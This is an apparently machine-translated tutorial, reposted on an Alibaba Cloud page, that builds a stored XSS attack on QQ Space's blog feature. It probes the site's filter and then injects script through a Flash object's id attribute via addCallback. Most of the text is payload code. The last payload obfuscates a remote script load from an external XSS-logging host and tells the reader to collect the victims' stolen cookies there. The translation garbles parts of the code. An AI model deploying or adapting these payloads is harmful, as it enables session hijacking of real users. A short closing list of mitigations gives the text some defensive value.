In those years, we will learn XSS-21. Storage-type XSS advanced [guessing rules, using Flash addCallback to construct XSS]

Source: Internet
Author: User

In some cases, we cannot use any ready-made XSS Code and are all filtered out. Therefore, we need to make some judgments and guesses on the filtering rules. Then use some targeted skills to adapt to or bypass the rules. In this example, we use the log function of QQ space/QQ alumni as an example to guess simple filtering rules, and then use the flash containing addCallback to construct a storage-type XSS. Description: 1. Prerequisites: This example must be performed under IE9 and IE10. 2. Some existing cases reported on wooyun were tested again.(QQ space + friend Network) log function storage XSSIn the preceding example, the log in the QQ space does not filter the object tag effectively. 3. we will test the Filtering Rule Based on the code in this example: <object width = "100%" height = "100%" align = "middle" classid = "clsid: d27cdb6e-ae6d-11cf-96b8-444553540000 "type =" application/x-shockwave-flash "> <param name =" Movie "VALUE =" http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf "> <Param name =" Src "VALUE =" http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf "> <Param name =" AllowScriptAccess "VALUE =" always "> the above Code can be submitted normally without filtering. <Object width = "100%" height = "100%" align = "middle" classid = "clsid: d27cdb6e-ae6d-11cf-96b8-444553540000 "type =" application/x-shockwave-flash "> <param name =" Movie "VALUE =" http://mysite.com/vphoto.swf "> <Param name =" Src "VALUE =" http://mysite.com/vphoto.swf "> <Param name =" AllowScriptAccess "VALUE =" always "> when the swf domain NAME is not qzs.qq.com, the code will be filtered into the following content. <Object width = "100%" height = "100%" align = "middle" classid = "clsid: d27cdb6e-ae6d-11cf-96b8-444553540000 "type =" application/x-shockwave-flash "> <param name =" AllowScriptAccess "VALUE =" always "> the address is removed. 4. Now we know that this filtering rule has two bypass methods. 4.1 find a defective FLASH Under the qzs.qq.com domain name and use it. This method already exists inGainoverOf(QQ space + friend Network) log function storage XSSI have introduced it. 4.2 Use the addcallback defect of Flash to construct a storage-type XSS. 5. First, let's talk about the basic principles of the flash addcallback method. Based on the source code in the flash sdk, we can see that the source code of flash addcallback contains the following code. If (activeX = true ))&&(! (ObjectID = null) {_ evalJS ("_ flash _ addCallback (document. getElementById (\ "" + objectID) + "\"), \ "") + functionName) + "\");"));}; here, objectID is the ID of the HTML Tag that calls FLASH. FunctionName is the name of the function called by JS. 6. when we have the following code: <object id = "aaaa" width = "100%" height = "100%" align = "middle" classid = "clsid: d27cdb6e-ae6d-11cf-96b8-444553540000 "type =" application/x-shockwave-flash "> <param name =" Movie "VALUE =" http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf "> <Param name =" Src "VALUE =" http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf "> <Param name =" AllowScriptAccess "VALUE =" always "> and http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf There is an ExternalInterface. addCallback ("myfunc", funcInFlash); then there is objectID = "aaaa"; functionName = "myfunc"; in the above sentence _ evalJS, there are _ flash _ addCallback (document. getElementById ("aaaa"), "myfunc"); 7. we can imagine that if aaaa is replaced by aaaa "), alert (1), (", the above Code becomes _ flash _ addCallback (document. getElementById ("aaaa"), alert (1), (""), "myfunc"); resolution: 8. in FLASH, objectID is not filtered. Based on the above content, we can build and utilize code. <Object id = 'aaaa "), alert (1), (" 'width = "100%" height = "100%" align = "middle" classid = "clsid: d27cdb6e-ae6d-11cf-96b8-444553540000 "type =" application/x-shockwave-flash "> <param name =" Movie "VALUE =" http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf "> <Param name =" Src "VALUE =" http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf "> <Param name =" AllowScriptAccess "VALUE =" always "> use the above Code to test it on your website: Check that the code in the id is executed! 9. Based on the above principles, we will test it in the QQ space. As for FLASH, it is ready for use! Although there is no defect in this FLASH, but there is a call to addCallback, we can use it directly. <Object width = "100%" height = "100%" align = "middle" id = "xsstest1 & quot), (function () {if (! Window. _ x) {window. _ x = 1; window. s = document. createElement (String. fromCharCode (115,99, 114,105,112,116); window. s. src = String. fromCharCode (104,116,116,112, 47,120,115,115,101,114, 46,109,101, 113,112, 121,); document. body. appendChild (window. s) ;}}) (), (& quot; "classid =" clsid: d27cdb6e-ae6d-11cf-96b8-444553540000 "type =" application/x-shockwave-flash "> <param name =" Movie "VALUE =" http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf "> <Param name =" Src "VALUE =" http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf "> <Param name =" AllowScriptAccess "VALUE =" always "> Publish logs using the above Code 10. after you access logs containing XSS code. me to view the recorded cookies.



  Solution:1. filter the object tag 2. Set allowscriptaccess to never. Even if it is set to sameDomain, you may find the FLASH file containing addCallback calls in the same domain.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.